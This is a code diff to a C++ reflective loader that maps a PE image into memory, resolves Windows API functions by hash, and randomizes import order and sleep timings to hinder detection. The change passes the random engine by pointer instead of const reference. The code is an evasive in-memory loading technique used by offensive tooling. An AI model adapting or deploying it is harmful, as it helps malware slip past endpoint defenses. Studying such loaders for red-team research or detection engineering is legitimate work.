diff --git a/reflective_loader/loader.cpp b/reflective_loader/loader.cpp index 6bfe37e..de53c71 100644 --- a/reflective_loader/loader.cpp +++ b/reflective_loader/loader.cpp @@ -20,12 +20,12 @@ void Load(PBYTE pImage, DWORD dwFunctionHash, PVOID pvUserData, DWORD dwUserData std::random_device rd; std::mt19937 eng(rd()); - auto pLoadLibraryW = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, LOAD_LIBRARY_W_HASH, eng)); - auto pGetProcAddress = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, GET_PROC_ADDRESS_HASH, eng)); - auto pVirtualAlloc = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, VIRTUAL_ALLOC_HASH, eng)); - auto pFlushInstructionCache = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, FLUSH_INSTRUCTION_CACHE_HASH, eng)); - auto pVirtualProtect = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, VIRTUAL_PROTECT_HASH, eng)); - auto pSleep = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, SLEEP_HASH, eng)); + auto pLoadLibraryW = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, LOAD_LIBRARY_W_HASH, &eng)); + auto pGetProcAddress = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, GET_PROC_ADDRESS_HASH, &eng)); + auto pVirtualAlloc = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, VIRTUAL_ALLOC_HASH, &eng)); + auto pFlushInstructionCache = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, FLUSH_INSTRUCTION_CACHE_HASH, &eng)); + auto pVirtualProtect = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, VIRTUAL_PROTECT_HASH, &eng)); + auto pSleep = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, SLEEP_HASH, &eng)); if (pLoadLibraryW == nullptr || pGetProcAddress == nullptr || pVirtualAlloc == nullptr || pFlushInstructionCache == nullptr || pVirtualProtect == nullptr || pSleep == nullptr) { return; @@ -80,7 +80,7 @@ void Load(PBYTE pImage, DWORD dwFunctionHash, PVOID pvUserData, DWORD dwUserData 4.) Resolve the imports by patching the Import Address Table (IAT) */ - if (!PatchImportAddressTable(pNewImageBase, pDataDir, pLoadLibraryW, pGetProcAddress, pSleep, eng)) { + if (!PatchImportAddressTable(pNewImageBase, pDataDir, pLoadLibraryW, pGetProcAddress, pSleep, &eng)) { return; } @@ -102,7 +102,7 @@ void Load(PBYTE pImage, DWORD dwFunctionHash, PVOID pvUserData, DWORD dwUserData } else { // Execute user defined function auto pbNewImageBase = reinterpret_cast(pNewImageBase); - auto pUserFunction = reinterpret_cast(GetExportAddrFromHash(pbNewImageBase, dwFunctionHash, eng)); + auto pUserFunction = reinterpret_cast(GetExportAddrFromHash(pbNewImageBase, dwFunctionHash, &eng)); pUserFunction(pvUserData, dwUserDataLen); } } @@ -160,7 +160,7 @@ void FinalizeRelocations(ULONG_PTR pNewImageBase, PIMAGE_NT_HEADERS64 pNtHeaders pFlushInstructionCache(INVALID_HANDLE_VALUE, nullptr, 0); } -BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, LOAD_LIBRARY_W pLoadLibraryW, GET_PROC_ADDRESS pGetProcAddress, SLEEP pSleep, const std::mt19937 &eng) { +BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, LOAD_LIBRARY_W pLoadLibraryW, GET_PROC_ADDRESS pGetProcAddress, SLEEP pSleep, std::mt19937 *eng) { auto pImportDescriptor = reinterpret_cast(pNewImageBase + pDataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); if (pImportDescriptor == nullptr) { @@ -188,7 +188,7 @@ BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDat if (importCount > 1 && OBFUSCATE_IMPORTS) { for (auto i = 0; i < importCount - 1; i++) { std::uniform_int_distribution<> distr(i, importCount - 1); - int j = distr(eng); + int j = distr(*eng); // Swap auto tmp = pImportDescriptor[i]; @@ -196,7 +196,7 @@ BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDat pImportDescriptor[j] = tmp; // Store unique sleep durations with their corresponding import index - auto sleepTime = sleepDist(eng); + auto sleepTime = sleepDist(*eng); sleepDurations.push_back(std::make_pair(i, sleepTime)); } } @@ -330,7 +330,7 @@ PBYTE GetModuleAddressFromHash(DWORD dwHash) { return nullptr; } -HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, const std::mt19937 &eng) { +HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, std::mt19937 *eng) { auto pNtHeaders = GetNtHeaders(pbModule); if (pNtHeaders == nullptr) { @@ -354,7 +354,7 @@ HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, const std::mt19937 & vNameRvas.push_back(std::make_tuple(dwNameRva, i)); } - std::shuffle(vNameRvas.begin(), vNameRvas.end(), eng); + std::shuffle(vNameRvas.begin(), vNameRvas.end(), *eng); DWORD dwNameHash, dwFunctionRva; UNICODE_STRING *strFunctionNameBase; diff --git a/reflective_loader/loader.hpp b/reflective_loader/loader.hpp index 06fa7ce..2e55618 100644 --- a/reflective_loader/loader.hpp +++ b/reflective_loader/loader.hpp @@ -62,10 +62,10 @@ using IMAGE_RELOC = _IMAGE_RELOC; using PIMAGE_RELOC = _IMAGE_RELOC *; PBYTE GetModuleAddressFromHash(DWORD dwHash); -HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, const std::mt19937 &eng); +HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, std::mt19937 *eng); PIMAGE_NT_HEADERS64 GetNtHeaders(PBYTE pbImage); void CopyHeadersAndSections(ULONG_PTR pNewImageBase, PBYTE pbImage, PIMAGE_NT_HEADERS64 pNtHeaders); BOOL ProcessRelocations(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, ULONG_PTR ulpDelta); -BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, LOAD_LIBRARY_W pLoadLibraryW, GET_PROC_ADDRESS pGetProcAddress, SLEEP pSleep, const std::mt19937 &eng); +BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, LOAD_LIBRARY_W pLoadLibraryW, GET_PROC_ADDRESS pGetProcAddress, SLEEP pSleep, std::mt19937 *eng); void FinalizeRelocations(ULONG_PTR pNewImageBase, PIMAGE_NT_HEADERS64 pNtHeaders, VIRTUAL_PROTECT pVirtualProtect, FLUSH_INSTRUCTION_CACHE pFlushInstructionCache);